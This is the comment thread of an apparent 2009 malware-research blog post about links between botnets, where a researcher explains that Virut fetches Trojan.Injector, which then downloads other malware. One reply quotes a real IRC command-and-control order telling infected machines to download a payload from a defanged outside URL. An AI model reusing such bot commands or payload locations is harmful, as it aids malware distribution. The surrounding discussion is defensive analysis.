« Conficker: Catch Me If You Can... | Main | RansomWare on the loose.. »

2009.04.07

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835018afd53ef01156fd1dde0970b

Listed below are links to weblogs that reference BotnetWeb: A Collection of Heterogeneous Botnets..:

Comments

Feed You can follow this conversation by subscribing to the comment feed for this post.

Thanks Thorsten,

..for raising a very good point. I am certainly aware of such cases and try not to include such cases while explaining relationships between Virut and other malware.

As you can see from the Virut graph, Virut has be seen downloading Trojan.Injector and all other malware are further downloaded by Injector not by Virut.

It normally happens like this...

1. Virut's IRC component executes and takes Injector download link from the cnc as:

:u. PRIVMSG zybjtfay :!get hxxp://goasi.cn/ex/a.php

hxxp://goasi.cn/ex/a.php , points to a binary which is Trojan.Injector and then all other sub downloads are done by Injector.
I hope I am able to clear my point here. If there is still more information required from my side, feel free to email us at :

research A-T fireeye d-o-t c-o-m


Thanks a lot for the interesting article! I have a quick comment regarding Virut: this malware is a file infector with an IRC component and not a classical bot. We quite often see other malware being infected with Virut, which often leads to a confusion regarding Virut in general. Could it be that your "Virut BotnetWeb" contains many artifacts which depend on which kind of malware is infected with Virut?

The comments to this entry are closed.